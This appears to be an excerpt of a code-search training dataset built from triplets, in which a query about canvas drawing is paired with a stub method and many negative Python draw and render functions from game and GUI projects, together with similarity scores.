[font.render(s, True, (255, 255, 255)) for s in strings]\n for i, text in enumerate(texts):\n self.display.blit(text, (self.disp_size[0]//20, i*20+self.disp_size[1]//20))\n pygame.display.update()\n main_screen = True\n while main_screen:\n print(\"Waiting for start\")\n event = pygame.event.wait()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n main_screen = False\n self.display.fill([255, 255, 255])\n grid.draw(self.display)\n pygame.display.update()\n print(\"Now painting\")\n while True:\n event = pygame.event.wait()\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n break\n pos = list((np.array(pygame.mouse.get_pos())/self.block_size).astype(int))\n if pygame.mouse.get_pressed() == (1, 0, 0):\n print(\"Add wall at\", pos)\n grid[pos].type = \"WALL\"\n grid[pos].draw(self.display, self.block_size)\n elif pygame.mouse.get_pressed() == (0, 0, 1):\n print(\"remove wall from\", pos)\n grid[pos].type = \"ROAD\"\n grid[pos].draw(self.display, self.block_size)\n pygame.display.update()", "def draw(self):\n # IMPLEMENT ME\n \"\"\"\n GRectangle(x=GAME_WIDTH/2,y=GAME_HEIGHT/2,\n width=GAME_WIDTH,height=GAME_HEIGHT,\n fillcolor=introcs.RGB(0,0,0)).draw(self.view)\n if self.getState() == STATE_INACTIVE:\n self.getText().draw(self.view)\n if self.getState() == STATE_PAUSED:\n self.getText().draw(self.view)\n if not self.getWave() is None:\n self.getWave().draw(self.view)\n if self.getState() == STATE_COMPLETE:\n self.getText().draw(self.view)\n if self.getState() == STATE_PAUSED or self.getState() == STATE_ACTIVE or self.getState() == STATE_COMPLETE:\n self.getText().draw(self.view)\n\n GRectangle(x=GAME_WIDTH/2,y=GAME_HEIGHT/2,\n width=GAME_WIDTH,height=GAME_HEIGHT,\n fillcolor=introcs.RGB(0,0,0)).draw(self.view)\"\"\"\n if not self.getText() is None:\n self.getText().draw(self.view)\n if not self.getWave() is None:\n self.getWave().draw(self.view)", "def draw(self):\n if (libt.map_is_in_fov(self.handler.fov_map, self.x, self.y) or \n self.handler.world.map[self.x][self.y].seen and self.visible_in_fog):\n libt.console_set_default_foreground(self.handler.game_map, self.colour)\n libt.console_put_char(self.handler.game_map, self.x, self.y, \n self.char, libt.BKGND_NONE)", "def _render(self, gc, points):\n with gc:\n gc.set_antialias(True)\n self._draw_default_axes(gc)\n self._draw_default_grid(gc)\n if len(points)>0:\n gc.clip_to_rect(self.x, self.y, self.width, self.height)\n gc.set_stroke_color(self.color_)\n gc.set_line_width(self.line_width)\n gc.set_line_dash(self.line_style_)\n\n gc.begin_path()\n gc.lines(points)\n gc.stroke_path()\n\n return", "def draw(self):\n if self.visible:\n glColor3f(self.r, self.g, self.b)\n graphicsBall(self.x, self.y, self.radius)\n\n if self.number <= 8:\n glColor3f(1.0, 1.0, 1.0)\n else:\n glColor3f(0.0, 0.0, 0.0)\n\n graphicsBall(self.x, self.y, self.radius / 2)\n\n if self.number > 0:\n if self.number > 8:\n glColor3f(1.0, 1.0, 1.0)\n else:\n glColor3f(0.0, 0.0, 0.0)\n\n if self.number < 10:\n graphicsText(self.x - 2, self.y - 3.5, str(self.number))\n else:\n graphicsText(self.x - 4.5, self.y - 3.5, str(self.number))", "def draw(self):\n self.write_image()\n self.update()", "def draw(self):\n self.figure.canvas.draw_idle()", "def draw( self, **kw ):\n pass", "def draw(self):\n if context.click():\n self.place()", "def draw(self):\n if self.is_clicked:\n pg.draw.circle(self.window, self.color, (self.x, self.y), self.r, 0)\n else:\n pg.draw.circle(self.window, self.color, (self.x, self.y), self.r, 1)", "def _onPaint(self, evt):\n if not self._isRealized:\n self.realize()\n if self._drawn < 2:\n self.draw(repaint = False)\n self._drawn += 1\n self.gui_repaint(drawDC=wx.PaintDC(self))", "def EndDraw(self):\r\n\r\n pass", "def test_draw(self):\n image_name = filename(sys._getframe().f_code.co_name)\n result_file, reference_file = get_path(image_name)\n\n ''' This function is to create an empty image with a specific dimension\n with white background, and black/white colored '''\n\n image, canvas = get_image('L', (15,90),'white')\n\n for i in range(len(draw_points) - 1):\n draw(canvas, (draw_points[i + 0], draw_points[i + 1]), 'A')\n\n \"\"\" saving the file and closing it \"\"\"\n\n image.save(result_file)\n image.close()\n\n \"\"\" validate the resultant file against the reference images\"\"\"\n\n validate(reference_file, result_file)", "def paint(self):\r\n pass", "def draw(self):\n self.batch.draw()", "def checkDraw(self) -> D:\n if self.board.positions.count(\" \") == 0:\n print(\"DRAW!\")\n return True", "def draw(self, surface, force=False):\n if self.redraw or force:\n surface.blit(self.image, self.loc)\n self.redraw = False", "def on_draw(self):\n # Clearing the buffers\n self.clear()\n self.set3d()\n # Makes it so color can be added\n glColor3d(1, 1, 1)\n\n self.push(self.player.pos, self.player.rot)\n self.model.draw()\n glPopMatrix()\n self.model.process_queue_slowly()\n\n # Draws the crosshairs on the screen\n self.set2d()\n self.draw_position_label()\n self.draw_reticle()", "def on_draw(self, screen):\n raise NotImplemented(\"on_draw method should be implemented.\")", "def draw(self):\n #for (x, y) in self.coords:\n # pyxel.rect(\n # (x + self.x) * 4,\n # (y + self.y) * 4,\n # (x + self.x) * 4 + 3,\n # (y + self.y) * 4 + 3,\n # self.color)", "def should_redraw_board(self):\n return True", "def draw(self):\n if self.dirty or (self.image is None):\n self._render()\n self.screen.blit(self.image, self.rect)", "def _draw(self):\r\n \r\n if self.active:\r\n self.surface = self.activeSurface # Set active surface to be displayed.\r\n else:\r\n self.surface = self.passiveSurface # Set passive surface to be displayed.\r", "def draw(self):\n with self:\n self.batch.draw()", "def draw(self):\n if self.node:\n if self.async:\n if self.cancel_draw:\n self.after_cancel(self.cancel_draw)\n self.cancel_draw = self.after(3, self._draw)\n else: self._draw()", "def _drawOnCanvas(self):\n self.canvas=np.ones(self.canvas.shape,dtype=np.uint8)*255\n for key in self.elements:\n graphElement=self.elements[key]\n graphElement.draw(self.canvas)\n self.sync=True", "def draw(self, *args, **kwargs):\n self.window.clear()\n self.batch.draw()", "def draw(self, force = False):\n\t\tpass", "def draw(self):\r\n self.canvas.delete(tk.ALL)\r\n\r\n # Draw the points.\r\n radius = 2\r\n for point in self.points:\r\n x0 = point[0] - radius\r\n y0 = point[1] - radius\r\n x1 = x0 + 2 * radius\r\n y1 = y0 + 2 * radius\r\n self.canvas.create_oval(x0, y0, x1, y1, fill=\"red\", outline=\"red\")\r\n\r\n # If we have a solution, draw it.\r\n if self.solved:\r\n curve = []\r\n for x in range(self.canvas.winfo_width()):\r\n curve.append((x, F(self.a_values, x)))\r\n self.canvas.create_line(curve, fill=\"blue\")", "def draw(self, surface):\r\n if self.visible:\r\n surface.blit(self.image, (self.x, self.y))", "def requires_rendering(self, skip_bool_switch=False):\n if self.sorting_active: \n # This is to ensure the last frame when the thread is complete is still rendered\n if (not skip_bool_switch):\n self.sorting_active = self.thread.is_alive()\n return True\n else:\n return False", "def on_draw(self):\n\t\tself.render()", "def on_draw(self):\n\t\tself.render()", "def draw(self):\n self.screen.fill(WHITE)\n self.color_invalid()\n self.draw_selected()\n self.shade_locked_cells()\n self.draw_grid()\n self.draw_buttons()\n self.draw_numbers()", "def expose_cb(self, darea, event):\n cr = darea.window.cairo_create()\n cr.rectangle(event.area.x, event.area.y,\n event.area.width, event.area.height)\n cr.clip()\n cr.set_source_surface(self.surface, 0, 0)\n cr.paint()\n\n return False", "def __draw(self, display, color, size):\n\t\tif self.walls[0]: # up\n\t\t\tpygame.draw.line(display, color, (self.col * size , self.row * size) , (self.col * size + size, self.row * size))\n\t\tif self.walls[3]: # down\n\t\t\tpygame.draw.line(display, color, (self.col * size + size, self.row * size + size), (self.col * size , self.row * size + size))\n\t\tif self.walls[1]: #left\n\t\t\tpygame.draw.line(display, color, (self.col * size + size, self.row * size) , (self.col * size + size, self.row * size + size))\n\t\tif self.walls[2]: #right\n\t\t\tpygame.draw.line(display, color, (self.col * size , self.row * size + size), (self.col * size , self.row * size))\n\n\t\tif self.current:\n\t\t\tdraw_rect_with_alpha(display, self.CURRENT_COLOR, Vector((self.col, self.row)) * size, (size, size))\n\n\t\telif self.backtracked and self.SHOW_BACKTRACK:\n\t\t\tdraw_rect_with_alpha(display, self.BACKTRACKED_COLOR, Vector((self.col, self.row)) * size, (size, size))\n\n\t\telif self.visited:\n\t\t\tdraw_rect_with_alpha(display, self.VISITED_COLOR, Vector((self.col, self.row)) * size, (size, size))", "def repaint(self):\n self.screen.blit(self.source, (0, 0))\n self.lcd.draw(self.lcddraw)\n if self.drawmode & self.DRAW_CIRCLE:\n self.plot_circle()\n pygame.display.flip()", "def drawBoard(self):\r\n self.outer.draw(self.surface)\r\n self.background.draw(self.surface)\r\n for point in self.points:\r\n point.draw(self.surface)\r\n point.drawCheckers(self.surface)\r\n self.dice.draw(self.surface)\r\n self.message.draw(self.surface)\r\n self.checkerBox.draw(self.surface)\r\n self.checkerBox.drawCheckers(self.surface)\r\n for bar in self.bar:\r\n bar.draw(self.surface)\r\n bar.drawCheckers(self.surface)\r\n pygame.display.flip()", "def draw(self):\r\n scalex,scaley = self.getScale()\r\n try:\r\n self.clear()\r\n # Draw Graph Background\r\n self.drawLayout()\r\n if self.app.data == None:# If no data, break\r\n return\r\n # How much each pixel represents\r\n if scalex[1]-scalex[0] == 0:\r\n return\r\n step = (scalex[1]-scalex[0])/self.w# Draw lines at pixel level resolution\r\n self.fitYScale()\r\n sens_index = [0]# If one sensor displayed in this data player\r\n if len(self.sensor_ids) == 2:# If two sensors displayed in this data player\r\n sens_index = [1,0]# Draw order blue then red to make blue line on top\r\n for s in sens_index:\r\n i = scalex[0]\r\n x = 0\r\n trackcol = self.app.getSensorCol(self.sensors[self.sensor_ids[s]])\r\n while i < scalex[1]:\r\n i += step# i Is data\r\n x += 1# x is iteration/pixel-coordinate\r\n if i<0:# Skip data for t<0\r\n continue\r\n try:\r\n # Data retrieved from xml\r\n y = float(self.app.data[int(i)][self.sensor_ids[s]].text)\r\n y2 = float(self.app.data[int(i+step)][self.sensor_ids[s]].text)\r\n # Normalize into range 0 to 1 and multiply by height\r\n y = ((y-scaley[0])/(scaley[1]-scaley[0])) * self.h\r\n y2 = ((y2-scaley[0])/(scaley[1]-scaley[0])) * self.h\r\n except IndexError:# Missing data is skipped\r\n continue\r\n self.c.create_line(x,-y+self.h,x+1,-y2+self.h,fill=trackcol,width=1)\r\n self.drawScrubber()\r\n self.drawPeekScrubber()\r\n self.c.update()\r\n except tk.TclError:# If canvas destroyed, cancel draw operation\r\n return", "def _changed_canvas(self):\n return self.canvas is not self.ax.figure.canvas", "def do_paint(self):\r\n curses.curs_set(0)\r\n if self.win:\r\n self.paint()\r\n self.done_paint()", "def draw(self, screen):\n\n if self.exist:\n screen.blit(self._img, self._rect)", "def draw(self):\n self._background.draw(self.view)\n if self._state == STATE_INACTIVE:\n self._message.draw(self.view)\n if self._state == STATE_COUNTDOWN:\n self._game.draw(self.view)\n self._countdownMessage.draw(self.view)\n self._soundImage.draw(self.view)\n if self._state == STATE_ACTIVE:\n self._game.draw(self.view)\n self._soundImage.draw(self.view)\n if self._state == STATE_PAUSED:\n self._game.draw(self.view)\n self._pausedMessage.draw(self.view)\n if self._state == STATE_RESET:\n self._message.draw(self.view)\n if self._state == STATE_COMPLETE:\n self._game.draw(self.view)\n self._pausedMessage.draw(self.view)", "def draw(self):\r\n try:\r\n self.sprite.draw()\r\n except:\r\n return -1", "def checkCanvasBoundsAndWrap(self):\n #check along the x axis\n if (self.xPos<0):\n self.setXPos(self.canvasIGetDrawnOnsWidth)\n \n elif (self.xPos>self.canvasIGetDrawnOnsWidth):\n self.setXPos(0)\n #check along the y axis\n if (self.yPos<0):\n self.setYPos(self.canvasIGetDrawnOnsHeight)\n \n elif (self.yPos>self.canvasIGetDrawnOnsHeight):\n self.setYPos(0)", "def draw(self):\n\n self.squares.draw(self.screen)\n if not self.hide_grid:\n self.draw_grid()\n self.fleas.draw(self.screen)\n pygame.display.flip()", "def draw(self):\n i = 0\n self.window.fill((60,50,20))\n for i in range(len(self.board)):\n for j in range(len(self.board[i])):\n pygame.draw.rect(self.window, ((i+j)%2*255, (i+j)%2*255, (i+j)%2*255), (20+j*100, 20+i*100, 100, 100))\n if self.board[i][j] != 0:\n if self.board[i][j].player == 0:\n color = (200, 0, 0)\n else:\n color = (0, 0, 200)\n if self.board[i][j].direction == 0:\n pygame.draw.ellipse(self.window, color, (30+j*100, 40+i*100, 80, 60))\n elif self.board[i][j].direction == 1:\n pygame.draw.ellipse(self.window, color, (40+j*100, 30+i*100, 60, 80))\n if self.board[i][j].master:\n if self.board[i][j].direction == 0:\n pygame.draw.ellipse(self.window, (255,255,0), (40+j*100, 50+i*100, 60, 40))\n pygame.draw.ellipse(self.window, color, (45+j*100, 55+i*100, 50, 30))\n elif self.board[i][j].direction == 1:\n pygame.draw.ellipse(self.window, (255,255,0), (50+j*100, 40+i*100, 40, 60))\n pygame.draw.ellipse(self.window, color, (55+j*100, 45+i*100, 30, 50))\n \n if self.selected != None:\n pygame.draw.rect(self.window, (200, 200, 0), (20+self.selected[1]*100, 20+self.selected[0]*100, 100, 100), 5)\n pygame.display.flip()", "def redraw(self):\n raise NotImplementedError()", "def draw(self):\n if self.state == 'alive':\n for i in range(len(self.tail)):\n pygame.draw.rect(display, black, (squareToXPix(self.tail[-(i + 1)][0], objectSize), squareToYPix(self.tail[-(i + 1)][1], objectSize), objectSize, objectSize))\n\n pygame.draw.rect(display, black, (squareToXPix(self.x, objectSize), squareToYPix(self.y, objectSize), objectSize, objectSize))\n\n else:\n for i in range(len(self.tail)):\n pygame.draw.rect(display, red, (squareToXPix(self.tail[-(i + 1)][0], objectSize), squareToYPix(self.tail[-(i + 1)][1], objectSize), objectSize, objectSize))\n\n pygame.draw.rect(display, red, (squareToXPix(self.x, objectSize), squareToYPix(self.y, objectSize), objectSize, objectSize))", "def draw2DOutlineEnabled(self):\n\n opts = self.opts\n overlay = self.overlay\n\n return ((overlay.trimesh is not None) and\n (opts.outline or opts.vertexData is not None))", "def draw(self):\n\n super().draw()\n\n if self.hit or self.miss:\n # Change colour depending on hit or miss\n fl_color(FL_RED if self.hit else FL_WHITE)\n fl_pie(self.x()+4, self.y()+4, self.w() - 8, self.h() - 8, 0.0, 360.0)", "def draw_game():\n # Fill window with background color\n RENDER_WINDOW.fill(BACKGROUNDCOLOR)\n\n # Draw Game Title\n draw_title()\n\n # Draw Puzzle\n draw_puzzle()\n \n # Draw buttons to GUI \n draw_buttons()\n\n # Draw Text\n draw_text() \n\n # Draw random toggle\n draw_rand_toggle()", "def draw():\n background(255)\n for i in range(COLS):\n for j in range(ROWS):\n if (BOARD[i][j] == 1): fill(0)\n else: fill(255)\n noStroke() # stroke(0)\n rect(i * CELL_SIZE, j * CELL_SIZE, CELL_SIZE, CELL_SIZE)\n if (PLAY):\n generate()", "def on_draw_over_image(self):", "def setDrawingMode(self):\n pass", "def tick(self):\n # detect pressed keys\n if not self.handle_events():\n return False\n # redraw\n if self.pause:\n return True\n self.phy.tick()\n color = 0\n self.screen.fill((0, 0, 0))\n new_image = pygame.Surface(self.screen.get_size()).convert()\n for p in self.phy.objects:\n self.put_object(new_image, p, COLORS[color])\n color = (color + 1) % len(COLORS)\n self.screen.blit(new_image, (0, 0))\n color = 0\n for p in self.phy.objects:\n text = \"%.2E\" % (int(p.mass))\n self.put_text(\n text,\n COLORS[color], (\n int(p.position[0] / SCALE_FACTOR) - len(text) * 5,\n int(p.position[1] / SCALE_FACTOR + int(p.radius) / SCALE_FACTOR * 1.2)\n )\n )\n color = (color + 1) % len(COLORS)\n self.show_status()\n pygame.display.set_icon(self.surficon)\n pygame.display.flip()\n return True", "def on_draw(self):\n\n # Clear the screen and start drawing\n arcade.start_render()\n\n # Draw the rectangles\n for shape in self.shapes:\n shape.draw()", "def draw(self) -> None:\n concenter = False\n if self.ui.checkConcenter.isChecked():\n concenter = True\n data_concenter = self.check_concenter()\n if data_concenter is None:\n message.show_error(config.USER_ERR3)\n return None\n\n if self.ui.tabWidget.currentIndex() == 0: # means circle\n data_circle = self.check_circle()\n if data_circle is None: # if data aren't correct\n message.show_error(config.USER_ERR1)\n return None\n\n current_algorithm = self.ui.comboBox.currentText() # Get name of method\n if concenter: # if checkbox of concenter is checked\n step, count = data_concenter\n for i in range(count):\n function.draw_circle(self, data_circle, current_algorithm)\n data_circle[2] += step\n else:\n function.draw_circle(self, data_circle, current_algorithm)\n\n elif self.ui.tabWidget.currentIndex() == 1: # means ellipse\n data_ellipse = self.check_ellipse()\n if data_ellipse is None:\n message.show_error(config.USER_ERR2)\n return None\n\n current_algorithm = self.ui.comboBox.currentText() # Get name of method\n if concenter: # if checkbox of concenter is checked\n step, count = data_concenter\n\n # We must know bigger side of ellipse to prevent its deformation\n a_bigger = data_ellipse[2] > data_ellipse[3]\n\n for i in range(count):\n function.draw_ellipse(self, data_ellipse, current_algorithm)\n # Bigger side must expands on step\n # Smaller only on part of it\n if a_bigger:\n data_ellipse[2] += step\n data_ellipse[3] += data_ellipse[3] / data_ellipse[2] * step\n else:\n data_ellipse[3] += step\n data_ellipse[2] += data_ellipse[2] / data_ellipse[3] * step\n else:\n function.draw_ellipse(self, data_ellipse, current_algorithm)\n\n else:\n message.show_error(config.PROG_ERR2)\n return None", "def draw(self, draw_surface):\n\n # The menu frame and how many surf (frame that appears in the middle\n # of the bottom of the screen).\n draw_surface.blit(self.menu_frame, (176, 112))\n draw_surface.blit(self.how_many_surf, (40, 115))\n\n if self.confirm_toss_response_dialogue is None and \\\n self.threw_away_dialogue is None:\n self.quantity_cursor.draw(draw_surface)\n\n # If on the trow away dialogue we don't need to draw anything else (it\n # is taken care of in the how many surf). Return so that cursor and\n # yes no surf are not drawn.\n if self.threw_away_dialogue is not None:\n return\n\n elif self.confirm_toss_response_dialogue is not None:\n draw_surface.blit(self.yes_no_surf, (195, 127))\n self.cursor.draw(draw_surface)", "def draw(self):\n\n for item in self.vis:\n item.undraw()\n self.render()\n for item in self.vis:\n item.draw(self.win)\n self.drawn = True", "def _redraw(self, render_as_done: \"bool\" = False) -> \"None\":\n if not self.drawn:\n cast(\"Application\", super())._redraw(render_as_done=True)\n self.drawn = True", "def draw(self, canvas):\n super().draw(canvas, self.__path)", "def draw(self):\n if not self.pressed:\n #draw dialogue prompt\n arcade.draw_rectangle_filled(self.center_x, self.center_y, 20, 20, arcade.color.ALABAMA_CRIMSON)\n arcade.draw_text(\"!\", self.center_x, self.center_y, arcade.color.BLACK, anchor_x=\"center\", anchor_y=\"center\")\n else:\n #draw dialogue box\n arcade.draw_rectangle_filled(self.center_x, self.center_y, self.width, self.height, self.color)\n arcade.draw_text(self.text, self.center_x, self.center_y, arcade.color.BLACK, anchor_x=\"center\", anchor_y=\"center\")" ]
[ "0.7068976", "0.70053196", "0.6794968", "0.67545444", "0.66375184", "0.66362685", "0.65746", "0.6460818", "0.6460818", "0.6460818", "0.6460818", "0.64464664", "0.64366764", "0.6423051", "0.63904214", "0.6366687", "0.6364581", "0.63468754", "0.63468754", "0.63468754", "0.62978816", "0.6290934", "0.6273019", "0.6251459", "0.62476724", "0.62395257", "0.62385046", "0.6224893", "0.61349225", "0.61160195", "0.61045873", "0.6097378", "0.6090018", "0.6048099", "0.6043411", "0.60073525", "0.5974841", "0.5967155", "0.59495264", "0.5938099", "0.59327537", "0.5932522", "0.5928842", "0.59226114", "0.5922082", "0.5912087", "0.5910711", "0.5907897", "0.590756", "0.5901464", "0.5896513", "0.58918786", "0.5878871", "0.5870126", "0.58647794", "0.5846707", "0.58386034", "0.5832981", "0.58222985", "0.58190364", "0.581843", "0.5813032", "0.5812299", "0.5809203", "0.5807177", "0.58064437", "0.5800713", "0.5800441", "0.5794315", "0.5794315", "0.5793278", "0.57868004", "0.57862043", "0.5769935", "0.576974", "0.5757159", "0.57402724", "0.5729087", "0.57290745", "0.57244146", "0.5709976", "0.56928456", "0.56807226", "0.56748706", "0.56732655", "0.56731117", "0.5671205", "0.56705725", "0.5662223", "0.5659172", "0.56587535", "0.5652816", "0.56461185", "0.5640305", "0.5638301", "0.5636397", "0.56319577", "0.5631324", "0.562536", "0.56091505" ]
0.8466848
0
Implement your canvas animation drawing logic here, returning False will stop the rendering, returning True will continue it
def draw_animation(self, canvas, animation_tick) -> bool: return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def draw(self, canvas) -> bool:\n return False", "def draw(self):\r\n if not self.stopped:\r\n super().draw()\r\n self.next_frame()", "def on_draw(self, widget, cr):\n #print \"starting to draw\"\n if self.double_buffer is not None:\n self.draw_tiles()\n cr.set_source_surface(self.double_buffer, 0.0, 0.0)\n cr.paint()\n else:\n print('Invalid double buffer')\n #print \"done drawing\"\n return False", "def paintGL(self):\n print \"Entereing paintGL\"\n if self.bDrawing == True:\n print \"Drawing was true so quit\"\n return\n \n \n self.bDrawing = True\n threadDrawGL = threading.Thread(target = self.drawGLScene)\n threadDrawGL.start()\n #self.drawGLScene()", "def draw (self, screen):\n drew = bool(self.draw_fn(self, screen, self.dirty))\n self.dirty = False\n return drew", "def draw():", "def draw(self):\n if self.node:\n if self.async:\n if self.cancel_draw:\n self.after_cancel(self.cancel_draw)\n self.cancel_draw = self.after(3, self._draw)\n else: self._draw()", "def _run(self):\n self._is_running = False\n self.start()\n self._pos += 1\n self.draw(self.img)", "def on_draw_event(self, widget, ctx):\n # the _need_redraw flag doesnt work. it sometimes prevents\n # the rendering and leaving the canvas blank\n #if self._need_redraw:\n self._renderer.set_context(ctx)\n allocation = self.get_allocation()\n x, y, w, h = allocation.x, allocation.y, allocation.width, allocation.height\n self._render_figure(w, h)\n #self._need_redraw = False\n\n return False # finish event propagation?", "def update(self):\n check_key_press = lambda key: self._window.was_key_pressed(key)\n frame = self._current_image.copy()\n\n for key, event in self._key_events.items():\n if check_key_press(key):\n event()\n\n for annotation in self._annotations:\n annotation.draw(frame)\n\n if self._annotation_in_progress is not None:\n self._annotation_in_progress.draw(frame)\n\n self.show_controls(frame)\n\n self._window.draw(frame)\n return not self._window.should_quit", "def game_draw(self):\n pass", "def draw(self):", "def draw(self):\n pass", "def draw(self):\n pass", "def draw(self):\n pass", "def draw(self):\n pass", "def draw(self):\n\t\tpass", "def _prepare_draw(self, view=None):\n return True", "def EndDraw(self):\r\n\r\n pass", "def repaint(self):\n self.screen.blit(self.source, (0, 0))\n self.lcd.draw(self.lcddraw)\n if self.drawmode & self.DRAW_CIRCLE:\n self.plot_circle()\n pygame.display.flip()", "def draw(canvas):\n\n max_row, max_col = canvas.getmaxyx()\n canvas.nodelay(True)\n\n COROUTINES.append(fire(canvas, max_row // 2, max_col // 2))\n COROUTINES.append(animate_spaceship(canvas, max_row // 2, max_col // 2 - 2, max_row, max_col))\n COROUTINES.append(fill_orbit_with_garbage(canvas))\n for i in range(STARS_AMOUNT):\n column = random.randint(1, max_col - 1)\n row = random.randint(1, max_row - 1)\n symbol = random.choice('+*.:')\n COROUTINES.append(blink(canvas, row, column, random.randint(0, 10), symbol))\n\n while COROUTINES:\n curses.curs_set(False)\n canvas.border()\n for coroutine in COROUTINES:\n try:\n coroutine.send(None)\n except StopIteration:\n COROUTINES.remove(coroutine)\n if len(COROUTINES) == 0:\n break\n canvas.refresh()\n time.sleep(TIC_TIMEOUT)", "def run_animation(self):\n self.animation = True\n self.fig = plt.figure()\n anim_running = True\n\n def onClick(event):\n nonlocal anim_running\n if anim_running:\n anim.event_source.stop()\n anim_running = False\n else:\n anim.event_source.start()\n anim_running = True\n\n self.fig.canvas.mpl_connect('button_press_event', onClick)\n anim = FuncAnimation(self.fig, self.update, fargs=None, interval=5)\n plt.show()", "def _logic(self):\n yes = self.yes_button.was_pressed or self.yes_button.pressed\n no = self.no_button.was_pressed or self.no_button.pressed\n\n # render\n if self.render_timer.finished:\n # start = time()\n self.window_renderer.update(self.buffer_image.tobytes())\n # debug(\"render time: %s\", time() - start)\n self.render_timer.start()\n\n if self.state == STATE_DEFAULT:\n if (no and not self.disable_quit) or (no and yes):\n self._enter_state(STATE_EXIT_PROMPT)\n elif yes:\n self._enter_state(STATE_PREPARE)\n\n elif self.state == STATE_EXIT_PROMPT:\n if yes:\n return False\n elif no:\n self._enter_state(STATE_DEFAULT)\n\n elif self.state == STATE_PREPARE:\n if no:\n self._enter_state(STATE_DEFAULT)\n elif self.countdown_timer.finished:\n self.pictures_taken = list()\n self.camera_controller.clear_workdir()\n self._enter_state(STATE_PICTURE_COUNTDOWN)\n\n elif self.state == STATE_PICTURE_COUNTDOWN:\n if no:\n self._enter_state(STATE_DEFAULT)\n elif self.countdown_timer.finished:\n self.pictures_taken.append(self.camera_controller.capture_photo())\n self._enter_state(STATE_PICTURE_TAKEN)\n else:\n self.window.find_by_name(NAME_GET_STARTED).text = \"\" \\\n + str(len(self.pictures_taken) + 1) + \" of \" + str(self.picture_count) \\\n + \"\\n\" + str(int(self.countdown_timer.remaining) + 1)\n\n elif self.state == STATE_PICTURE_TAKEN:\n if no:\n self._enter_state(STATE_DEFAULT)\n elif self.countdown_timer.finished:\n if len(self.pictures_taken) >= self.picture_count:\n t = threading.Thread(target=self._upload_to_twitter)\n t.start()\n self._enter_state(STATE_PRINT)\n else:\n self._enter_state(STATE_PICTURE_COUNTDOWN)\n\n elif self.state == STATE_PRINT:\n if no:\n self._enter_state(STATE_DEFAULT)\n elif yes:\n self._enter_state(STATE_PRINTING)\n\n elif self.state == STATE_PRINTING:\n if no:\n self._enter_state(STATE_DEFAULT)\n else:\n strip_file = self.create_strip()\n args = self.print_command.replace('{filename}', strip_file).split()\n subprocess.Popen(args)\n self._enter_state(STATE_COMPLETED)\n\n elif self.state == STATE_COMPLETED:\n if yes or no or self.countdown_timer.finished:\n self._enter_state(STATE_DEFAULT)\n\n else:\n raise RuntimeError(\"The app is in an unknown state: \" + str(self.state))\n\n return True", "def _update_anim(self):\n if self._skip_frames > 1:\n # Do not render while _skip_frames is > 1\n self._skip_frames -= 1\n else:\n # Render frame\n self._visualization.taskMgr.step()\n # Calculate number of frames that need to be skipped\n self._skip_frames = int(1 / self._fps / self._dt)", "def drawStar(duration):\n # START CODE HERE #\n\n\n pass\n # END CODE HERE # (remove the pass statement)", "def pre_draw(self):", "def draw(self):\n self.figure.canvas.draw_idle()", "def draw(self):\n # IMPLEMENT ME\n \"\"\"\n GRectangle(x=GAME_WIDTH/2,y=GAME_HEIGHT/2,\n width=GAME_WIDTH,height=GAME_HEIGHT,\n fillcolor=introcs.RGB(0,0,0)).draw(self.view)\n if self.getState() == STATE_INACTIVE:\n self.getText().draw(self.view)\n if self.getState() == STATE_PAUSED:\n self.getText().draw(self.view)\n if not self.getWave() is None:\n self.getWave().draw(self.view)\n if self.getState() == STATE_COMPLETE:\n self.getText().draw(self.view)\n if self.getState() == STATE_PAUSED or self.getState() == STATE_ACTIVE or self.getState() == STATE_COMPLETE:\n self.getText().draw(self.view)\n\n GRectangle(x=GAME_WIDTH/2,y=GAME_HEIGHT/2,\n width=GAME_WIDTH,height=GAME_HEIGHT,\n fillcolor=introcs.RGB(0,0,0)).draw(self.view)\"\"\"\n if not self.getText() is None:\n self.getText().draw(self.view)\n if not self.getWave() is None:\n self.getWave().draw(self.view)", "def _draw(self, canvas, options):\n pass # must override in subclass", "def draw(self):\n if self.is_clicked:\n pg.draw.circle(self.window, self.color, (self.x, self.y), self.r, 0)\n else:\n pg.draw.circle(self.window, self.color, (self.x, self.y), self.r, 1)", "def on_draw(self):\n # Clearing the buffers\n self.clear()\n self.set3d()\n # Makes it so color can be added\n glColor3d(1, 1, 1)\n\n self.push(self.player.pos, self.player.rot)\n self.model.draw()\n glPopMatrix()\n self.model.process_queue_slowly()\n\n # Draws the crosshairs on the screen\n self.set2d()\n self.draw_position_label()\n self.draw_reticle()", "def execute(self):\n while(self._running):\n for event in pygame.event.get():\n self.event_handler(event)\n \"\"\"Drawing\"\"\"\n if self.state == self.states['Game']:\n self.update_state()\n self.move()\n\n self.render()\n self.cleanup()", "def draw(self):\n if self.visible:\n glColor3f(self.r, self.g, self.b)\n graphicsBall(self.x, self.y, self.radius)\n\n if self.number <= 8:\n glColor3f(1.0, 1.0, 1.0)\n else:\n glColor3f(0.0, 0.0, 0.0)\n\n graphicsBall(self.x, self.y, self.radius / 2)\n\n if self.number > 0:\n if self.number > 8:\n glColor3f(1.0, 1.0, 1.0)\n else:\n glColor3f(0.0, 0.0, 0.0)\n\n if self.number < 10:\n graphicsText(self.x - 2, self.y - 3.5, str(self.number))\n else:\n graphicsText(self.x - 4.5, self.y - 3.5, str(self.number))", "def draw(self):\n raise NotImplementedError", "def draw(self):\n raise NotImplementedError", "def draw(self):\n raise NotImplementedError", "def draw(self, screen):", "def draw(self):\n\n for row in self._board:\n for slot in row:\n if slot == 0:\n return False\n print \"It's a draw!\"\n return True", "def draw(self, surface, tick, camera, size):\n\t\tif self._state == Character.STANDING:\n\t\t\tself._stand_animation.draw(surface, self._collision_rect.x - camera[0], self._collision_rect.y - camera[1],\n\t\t\t\t\t\t\t\t\t tick)\n\t\telif self._state == Character.WALKING:\n\t\t\tself._walk_animation.draw(surface, self._collision_rect.x - camera[0], self._collision_rect.y - camera[1],\n\t\t\t\t\t\t\t\t\t tick, self._direction == Character.LEFT)\n\t\telif self._state == Character.JUMPING:\n\t\t\tif self._direction == Character.NONE:\n\t\t\t\tself._jump_animation.draw(surface, self._collision_rect.x - camera[0],\n\t\t\t\t\t\t\t\t\t\t self._collision_rect.y - camera[1], tick)\n\t\t\telse:\n\t\t\t\tself._jump_right_animation.draw(surface, self._collision_rect.x - camera[0],\n\t\t\t\t\t\t\t\t\t\t\t\tself._collision_rect.y - camera[1], 